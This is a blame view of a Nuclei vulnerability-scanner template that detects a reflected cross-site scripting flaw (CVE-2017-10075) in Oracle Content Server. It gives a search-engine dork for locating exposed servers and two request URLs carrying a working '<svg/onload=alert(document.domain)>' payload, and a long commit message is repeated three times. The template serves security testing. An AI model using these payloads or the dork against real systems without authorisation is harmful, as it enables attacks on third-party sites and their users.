nuclei-templates/http/cves/2017/CVE-2017-10075.yaml

49 lines
2.1 KiB
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2017-10075
2020-07-31 17:53:22 +00:00
info:
2022-10-26 07:33:37 +00:00
name: Oracle Content Server - Cross-Site Scripting
2020-07-31 17:53:22 +00:00
author: madrobot
severity: high
2022-10-26 07:33:37 +00:00
description: |
Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
Dashboard Content Enhancements (#4157) * Enhancement: exposures/files/joomla-file-listing.yaml by cs * Enhancement: cves/2019/CVE-2019-5418.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2021/CVE-2021-20091.yaml by mp * Enhancement: cves/2021/CVE-2021-20092.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: cves/2017/CVE-2017-9833.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: misconfiguration/symfony-debugmode.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/my-chatbot-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-adaptive-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: cves/2021/CVE-2021-31682.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-woocommerce-file-download.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Relocating to CVE folder * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-2628.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2019/CVE-2019-2588.yaml by mp * Enhancement: cves/2021/CVE-2021-31755.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Enhancement: misconfiguration/zabbix-dashboards-access.yaml by mp * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Syntax corrections Added some cve-id fields Removed duplicate dashboard comments * Tag typo Co-authored-by: sullo <sullo@cirt.net>
2022-04-15 16:39:44 +00:00
reference:
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
2022-10-26 07:33:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2017-10075
2022-10-26 07:33:37 +00:00
metadata:
max-request: 2
2023-01-24 10:08:35 +00:00
google-query: inurl:"/cs/idcplg"
verified: "true"
Dashboard Content Enhancements (#4157) * Enhancement: exposures/files/joomla-file-listing.yaml by cs * Enhancement: cves/2019/CVE-2019-5418.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2021/CVE-2021-20091.yaml by mp * Enhancement: cves/2021/CVE-2021-20092.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: cves/2017/CVE-2017-9833.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: misconfiguration/symfony-debugmode.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/my-chatbot-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-adaptive-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: cves/2021/CVE-2021-31682.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-woocommerce-file-download.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Relocating to CVE folder * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-2628.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2019/CVE-2019-2588.yaml by mp * Enhancement: cves/2021/CVE-2021-31755.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Enhancement: misconfiguration/zabbix-dashboards-access.yaml by mp * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Syntax corrections Added some cve-id fields Removed duplicate dashboard comments * Tag typo Co-authored-by: sullo <sullo@cirt.net>
2022-04-15 16:39:44 +00:00
tags: cve,cve2017,xss,oracle
2020-07-31 17:53:22 +00:00
http:
2020-07-31 17:53:22 +00:00
- method: GET
path:
2022-10-26 07:33:37 +00:00
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"
2020-07-31 17:53:22 +00:00
2022-10-26 07:33:37 +00:00
stop-at-first-match: true
2020-07-31 17:53:22 +00:00
matchers-condition: and
matchers:
2022-10-26 07:33:37 +00:00
- type: word
part: body
words:
- "<svg/onload=alert(document.domain)>"
- "ORACLE_QUERY"
condition: and
- type: word
part: header
words:
- text/html
2020-07-31 17:53:22 +00:00
- type: status
status:
- 200
Dashboard Content Enhancements (#4157) * Enhancement: exposures/files/joomla-file-listing.yaml by cs * Enhancement: cves/2019/CVE-2019-5418.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2021/CVE-2021-20091.yaml by mp * Enhancement: cves/2021/CVE-2021-20092.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: cves/2017/CVE-2017-9833.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: misconfiguration/symfony-debugmode.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/my-chatbot-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-adaptive-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: cves/2021/CVE-2021-31682.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-woocommerce-file-download.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Relocating to CVE folder * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-2628.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2019/CVE-2019-2588.yaml by mp * Enhancement: cves/2021/CVE-2021-31755.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Enhancement: misconfiguration/zabbix-dashboards-access.yaml by mp * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Syntax corrections Added some cve-id fields Removed duplicate dashboard comments * Tag typo Co-authored-by: sullo <sullo@cirt.net>
2022-04-15 16:39:44 +00:00
# Enhanced by mp on 2022/04/12